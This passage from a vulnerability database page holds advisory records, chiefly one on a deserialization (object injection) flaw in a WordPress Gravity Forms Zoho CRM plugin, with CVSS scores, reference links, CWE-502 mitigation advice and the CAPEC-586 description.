      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54469"
    },
    {
      "type": "WEB",
      "url": "https://www.dell.com/support/kbdoc/en-us/000483543/dsa-2026-272-dell-powermaxos-dell-powermax-eem-dell-unisphere-for-powermax-dell-unisphere-for-powermax-virtualappliance-dell-unisphere-360-dell-solutionsenabler-and-dell-solutionsenabler-virtualappliance-security-update-for-multiple-vulnerabilities"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-PVP6-43QX-G5FM

Vulnerability from github – Published: 2025-12-18 09:30 – Updated: 2026-01-20 15:32
VLAI
Details

Deserialization of Untrusted Data vulnerability in CRM Perks WP Gravity Forms Zoho CRM and Bigin gf-zoho allows Object Injection.This issue affects WP Gravity Forms Zoho CRM and Bigin: from n/a through <= 1.2.9.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-60091"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-12-18T08:16:09Z",
    "severity": "CRITICAL"
  },
  "details": "Deserialization of Untrusted Data vulnerability in CRM Perks WP Gravity Forms Zoho CRM and Bigin gf-zoho allows Object Injection.This issue affects WP Gravity Forms Zoho CRM and Bigin: from n/a through \u003c= 1.2.9.",
  "id": "GHSA-pvp6-43qx-g5fm",
  "modified": "2026-01-20T15:32:30Z",
  "published": "2025-12-18T09:30:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60091"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/gf-zoho/vulnerability/wordpress-wp-gravity-forms-zoho-crm-and-bigin-plugin-1-2-8-deserialization-of-untrusted-data-vulnerability?_s_id=cve"
    },
    {
      "type": "WEB",
      "url": "https://vdp.patchstack.com/database/Wordpress/Plugin/gf-zoho/vulnerability/wordpress-wp-gravity-forms-zoho-crm-and-bigin-plugin-1-2-8-deserialization-of-untrusted-data-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design Implementation

If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.

Mitigation
Implementation

When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.

Mitigation
Implementation

Explicitly define a final object() to prevent deserialization.

Mitigation
Architecture and Design Implementation
  • Make fields transient to protect them from deserialization.
  • An attempt to serialize and then deserialize a class containing transient fields will result in NULLs where the transient data should be. This is an excellent way to prevent time, environment-based, or sensitive variables from being carried over and used improperly.
Mitigation
Implementation

Avoid having unnecessary types or gadgets (a sequence of instances and method invocations that can self-execute during the deserialization process, often found in libraries) available that can be leveraged for malicious ends. This limits the potential for unintended or unauthorized types and gadgets to be leveraged by the attacker. Add only acceptable classes to an allowlist. Note: new gadgets are constantly being discovered, so this alone is not a sufficient mitigation.

Mitigation
Architecture and Design Implementation

Employ cryptography of the data or code for protection. However, it's important to note that it would still be client-side security. This is risky because if the client is compromised then the security implemented on the client (the cryptography) can be bypassed.

Mitigation MIT-29
Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].

CAPEC-586: Object Injection

An adversary attempts to exploit an application by injecting additional, malicious content during its processing of serialized objects. Developers leverage serialization in order to convert data or state into a static, binary format for saving to disk or transferring over a network. These objects are then deserialized when needed to recover the data/state. By injecting a malformed object into a vulnerable application, an adversary can potentially compromise the application by manipulating the deserialization process. This can result in a number of unwanted outcomes, including remote code execution.